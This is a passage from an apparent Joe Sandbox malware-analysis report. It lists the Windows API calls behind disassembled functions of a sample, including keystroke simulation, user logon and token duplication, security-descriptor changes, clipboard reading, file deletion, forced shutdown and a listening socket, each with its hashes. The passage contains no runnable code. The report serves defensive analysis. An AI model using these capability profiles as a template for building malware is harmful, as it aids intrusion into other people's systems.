                                                                                  • API String ID: 4054740463-328681919
                                                                                  • Opcode ID: a3a6f92686ccb8d93a019c5c2d67a8799064d0a379ef68d08e0a713f8854ef68
                                                                                  • Instruction ID: 3fef23194d03ecbd4af76f68a7bb5262fd6aa79b19030858fe6c08ed0a20e43b
                                                                                  • Opcode Fuzzy Hash: a3a6f92686ccb8d93a019c5c2d67a8799064d0a379ef68d08e0a713f8854ef68
                                                                                  • Instruction Fuzzy Hash: A6121131510315AFEB24AF28DC49FAEBBF8EF84309F104119F816DA2D0D7749A95CB54
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 001DF998
                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0021F474
                                                                                  • IsIconic.USER32(00000000), ref: 0021F47D
                                                                                  • ShowWindow.USER32(00000000,00000009), ref: 0021F48A
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 0021F494
                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0021F4AA
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0021F4B1
                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0021F4BD
                                                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 0021F4CE
                                                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 0021F4D6
                                                                                  • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0021F4DE
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 0021F4E1
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0021F4F6
                                                                                  • keybd_event.USER32(00000012,00000000), ref: 0021F501
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0021F50B
                                                                                  • keybd_event.USER32(00000012,00000000), ref: 0021F510
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0021F519
                                                                                  • keybd_event.USER32(00000012,00000000), ref: 0021F51E
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0021F528
                                                                                  • keybd_event.USER32(00000012,00000000), ref: 0021F52D
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 0021F530
                                                                                  • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0021F557
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                  • String ID: Shell_TrayWnd
                                                                                  • API String ID: 4125248594-2988720461
                                                                                  • Opcode ID: f14882ecf6b578f48606b22bca5eb9c00762960c90e13f955cb0bd5e4ceab413
                                                                                  • Instruction ID: 65cb244ad6376371842e26a9ac84c51feff575176fa15634d61e42c0e9c39c2a
                                                                                  • Opcode Fuzzy Hash: f14882ecf6b578f48606b22bca5eb9c00762960c90e13f955cb0bd5e4ceab413
                                                                                  • Instruction Fuzzy Hash: 4F318E71A50318BFEB206FB55C4AFBF7EADEB44B51F200065FA00F61D1E6B05D50AAA4
                                                                                  APIs
                                                                                    • Part of subcall function 002216C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0022170D
                                                                                    • Part of subcall function 002216C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0022173A
                                                                                    • Part of subcall function 002216C3: GetLastError.KERNEL32 ref: 0022174A
                                                                                  • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00221286
                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 002212A8
                                                                                  • CloseHandle.KERNEL32(?), ref: 002212B9
                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002212D1
                                                                                  • GetProcessWindowStation.USER32 ref: 002212EA
                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 002212F4
                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00221310
                                                                                    • Part of subcall function 002210BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002211FC), ref: 002210D4
                                                                                    • Part of subcall function 002210BF: CloseHandle.KERNEL32(?,?,002211FC), ref: 002210E9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                  • String ID: $default$winsta0$Z(
                                                                                  • API String ID: 22674027-3330260838
                                                                                  • Opcode ID: 5af3e12d662bfbf9b627d18a27a4309fee31ea1a31a5929df282b64a8abd4752
                                                                                  • Instruction ID: ed5253685f2a23745e3c1939c94f2ee11e2c6f8ccbf9e947e59e891272e0cb72
                                                                                  • Opcode Fuzzy Hash: 5af3e12d662bfbf9b627d18a27a4309fee31ea1a31a5929df282b64a8abd4752
                                                                                  • Instruction Fuzzy Hash: 2E81897191031ABFDF20AFA4EC49FEE7BB9EF18704F144129F915A61A0D7718A64CB24
                                                                                  APIs
                                                                                    • Part of subcall function 002210F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00221114
                                                                                    • Part of subcall function 002210F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00220B9B,?,?,?), ref: 00221120
                                                                                    • Part of subcall function 002210F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00220B9B,?,?,?), ref: 0022112F
                                                                                    • Part of subcall function 002210F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00220B9B,?,?,?), ref: 00221136
                                                                                    • Part of subcall function 002210F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0022114D
                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00220BCC
                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00220C00
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00220C17
                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00220C51
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00220C6D
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00220C84
                                                                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00220C8C
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00220C93
                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00220CB4
                                                                                  • CopySid.ADVAPI32(00000000), ref: 00220CBB
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00220CEA
                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00220D0C
                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00220D1E
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00220D45
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00220D4C
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00220D55
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00220D5C
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00220D65
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00220D6C
                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00220D78
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00220D7F
                                                                                    • Part of subcall function 00221193: GetProcessHeap.KERNEL32(00000008,00220BB1,?,00000000,?,00220BB1,?), ref: 002211A1
                                                                                    • Part of subcall function 00221193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00220BB1,?), ref: 002211A8
                                                                                    • Part of subcall function 00221193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00220BB1,?), ref: 002211B7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                  • String ID:
                                                                                  • API String ID: 4175595110-0
                                                                                  • Opcode ID: 3754a4b5c8ba4861954743992e24f16f2d648c8f9817a554242d3d0e3024c57c
                                                                                  • Instruction ID: 968ce97ea80faa5a2c20454d101c710fd68e5e5bfd04c477e65e15e24ddd713d
                                                                                  • Opcode Fuzzy Hash: 3754a4b5c8ba4861954743992e24f16f2d648c8f9817a554242d3d0e3024c57c
                                                                                  • Instruction Fuzzy Hash: A4714A7191131ABFDF109FE4EC88BAEBBB8FF04311F144525E914A6192E771A915CF60
                                                                                  APIs
                                                                                  • OpenClipboard.USER32(0025CC08), ref: 0023EB29
                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0023EB37
                                                                                  • GetClipboardData.USER32(0000000D), ref: 0023EB43
                                                                                  • CloseClipboard.USER32 ref: 0023EB4F
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0023EB87
                                                                                  • CloseClipboard.USER32 ref: 0023EB91
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0023EBBC
                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0023EBC9
                                                                                  • GetClipboardData.USER32(00000001), ref: 0023EBD1
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0023EBE2
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0023EC22
                                                                                  • IsClipboardFormatAvailable.USER32(0000000F), ref: 0023EC38
                                                                                  • GetClipboardData.USER32(0000000F), ref: 0023EC44
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0023EC55
                                                                                  • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0023EC77
                                                                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0023EC94
                                                                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0023ECD2
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0023ECF3
                                                                                  • CountClipboardFormats.USER32 ref: 0023ED14
                                                                                  • CloseClipboard.USER32 ref: 0023ED59
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                  • String ID:
                                                                                  • API String ID: 420908878-0
                                                                                  • Opcode ID: 09ef43b04a38d826855d6be97a4812d3babf8d99c41bb5b872767a60d3ad1b22
                                                                                  • Instruction ID: 75b394e84fa4abf48aaeb186db17041b23493ef3468df3be0f3573b51c6bba10
                                                                                  • Opcode Fuzzy Hash: 09ef43b04a38d826855d6be97a4812d3babf8d99c41bb5b872767a60d3ad1b22
                                                                                  • Instruction Fuzzy Hash: A661DEB42043069FD700EF20E889F3AB7A9BF94704F25451DF8569B2E2DB70D909CB62
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 002369BE
                                                                                  • FindClose.KERNEL32(00000000), ref: 00236A12
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00236A4E
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00236A75
                                                                                    • Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00236AB2
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00236ADF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                  • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                  • API String ID: 3830820486-3289030164
                                                                                  • Opcode ID: 27830e386077296d7e9688481be09475aafd31bda5300cb26015554d46654974
                                                                                  • Instruction ID: bdc501db4081e35f9f9f2a219cf23db0fd1749b9adb2d15c6f4ff1dce1f4dd98
                                                                                  • Opcode Fuzzy Hash: 27830e386077296d7e9688481be09475aafd31bda5300cb26015554d46654974
                                                                                  • Instruction Fuzzy Hash: 60D161B2508304AFC310EFA4D896EABB7ECAFA9704F04491DF585D7191EB74DA44CB62
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00239663
                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 002396A1
                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 002396BB
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 002396D3
                                                                                  • FindClose.KERNEL32(00000000), ref: 002396DE
                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 002396FA
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0023974A
                                                                                  • SetCurrentDirectoryW.KERNEL32(00286B7C), ref: 00239768
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00239772
                                                                                  • FindClose.KERNEL32(00000000), ref: 0023977F
                                                                                  • FindClose.KERNEL32(00000000), ref: 0023978F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                  • String ID: *.*
                                                                                  • API String ID: 1409584000-438819550
                                                                                  • Opcode ID: 90643912e11396003d8db8b3b46e98e3bf35226e65722948a08c8884effd0029
                                                                                  • Instruction ID: 6fd7a800a570d45c6c182c549a669e8f77afefb59c677ecdb7511ebafb07da0b
                                                                                  • Opcode Fuzzy Hash: 90643912e11396003d8db8b3b46e98e3bf35226e65722948a08c8884effd0029
                                                                                  • Instruction Fuzzy Hash: 9B31D2B256171A6EDB10AFB4EC4DAEE77AC9F0A325F104056E905E20E0EBB0DD948E14
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 002397BE
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00239819
                                                                                  • FindClose.KERNEL32(00000000), ref: 00239824
                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00239840
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00239890
                                                                                  • SetCurrentDirectoryW.KERNEL32(00286B7C), ref: 002398AE
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 002398B8
                                                                                  • FindClose.KERNEL32(00000000), ref: 002398C5
                                                                                  • FindClose.KERNEL32(00000000), ref: 002398D5
                                                                                    • Part of subcall function 0022DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0022DB00
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                  • String ID: *.*
                                                                                  • API String ID: 2640511053-438819550
                                                                                  • Opcode ID: 14d4c862b9a2f2942270fb0314d57f033f6374a86ce7341250bdecf7d71c2689
                                                                                  • Instruction ID: ea2a8a2828ca790cd1f298d585e9803bd728bd3f58ea514f04bc35f9c6ece768
                                                                                  • Opcode Fuzzy Hash: 14d4c862b9a2f2942270fb0314d57f033f6374a86ce7341250bdecf7d71c2689
                                                                                  • Instruction Fuzzy Hash: AA31C37251171A6EDB10AFB4EC48ADE77AC9F47325F204156E910E20E1EBB0DDA5CF24
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(?), ref: 00238257
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00238267
                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00238273
                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00238310
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00238324
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00238356
                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0023838C
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00238395
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectoryTime$File$Local$System
                                                                                  • String ID: *.*
                                                                                  • API String ID: 1464919966-438819550
                                                                                  • Opcode ID: 6b6dbde0fc1742bcd09d3107c1d56340aca584101882dfbe88132bb39a18a90f
                                                                                  • Instruction ID: 4b817f86dd3923c9289d81199ae4e97a9daa72dda7dcd67915c7695edc51ced0
                                                                                  • Opcode Fuzzy Hash: 6b6dbde0fc1742bcd09d3107c1d56340aca584101882dfbe88132bb39a18a90f
                                                                                  • Instruction Fuzzy Hash: DA6189B21183459FCB10EF60D845AAEB3E8FF99310F04491DF989C7251EB31E915CB92
                                                                                  APIs
                                                                                    • Part of subcall function 001C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001C3A97,?,?,001C2E7F,?,?,?,00000000), ref: 001C3AC2
                                                                                    • Part of subcall function 0022E199: GetFileAttributesW.KERNEL32(?,0022CF95), ref: 0022E19A
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0022D122
                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0022D1DD
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 0022D1F0
                                                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 0022D20D
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0022D237
                                                                                    • Part of subcall function 0022D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0022D21C,?,?), ref: 0022D2B2
                                                                                  • FindClose.KERNEL32(00000000,?,?,?), ref: 0022D253
                                                                                  • FindClose.KERNEL32(00000000), ref: 0022D264
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 1946585618-1173974218
                                                                                  • Opcode ID: 0f9a6d9c5801cfdca72004c9ff6d9b4d682cc58372520855f5ea143a5e817d53
                                                                                  • Instruction ID: d0d31629c9807f080ae1602aa987ea06044a5df68c582837eaaa8f870e895831
                                                                                  • Opcode Fuzzy Hash: 0f9a6d9c5801cfdca72004c9ff6d9b4d682cc58372520855f5ea143a5e817d53
                                                                                  • Instruction Fuzzy Hash: 80615D3180121DAECF15EFE0E956EEDB775AF25304F204169E80677192EB30AF19DB60
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1737998785-0
                                                                                  • Opcode ID: 8eae5e7b5116930349c3784647fc4fb673d1853b9b3dc1032b6e3a0efb2c1ddf
                                                                                  • Instruction ID: d08497596723886344f294c3c4224139de4add8d2aac48634efe6e900b04619e
                                                                                  • Opcode Fuzzy Hash: 8eae5e7b5116930349c3784647fc4fb673d1853b9b3dc1032b6e3a0efb2c1ddf
                                                                                  • Instruction Fuzzy Hash: B641EFB0214312AFE710CF15E888F1ABBE4EF44329F15C09DE8198B6A2C731ED42CB80
                                                                                  APIs
                                                                                    • Part of subcall function 002216C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0022170D
                                                                                    • Part of subcall function 002216C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0022173A
                                                                                    • Part of subcall function 002216C3: GetLastError.KERNEL32 ref: 0022174A
                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 0022E932
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                  • String ID: $ $@$SeShutdownPrivilege
                                                                                  • API String ID: 2234035333-3163812486
                                                                                  • Opcode ID: 04ba00aede11749a556a344ea3e88a8e55346055281eaf3085ebbee5424d8b18
                                                                                  • Instruction ID: 97d34b9153c96024b0baf6fe17ea82740cd472572d61664f25a4ec295d83c54b
                                                                                  • Opcode Fuzzy Hash: 04ba00aede11749a556a344ea3e88a8e55346055281eaf3085ebbee5424d8b18
                                                                                  • Instruction Fuzzy Hash: D401A272630331BFEF542AF4BC8AFBF725C9714751F260422FC02E21D2E5A05CA49694
                                                                                  APIs
                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00241276
                                                                                  • WSAGetLastError.WSOCK32 ref: 00241283
                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 002412BA
                                                                                  • WSAGetLastError.WSOCK32 ref: 002412C5
                                                                                  • closesocket.WSOCK32(00000000), ref: 002412F4
                                                                                  • listen.WSOCK32(00000000,00000005), ref: 00241303
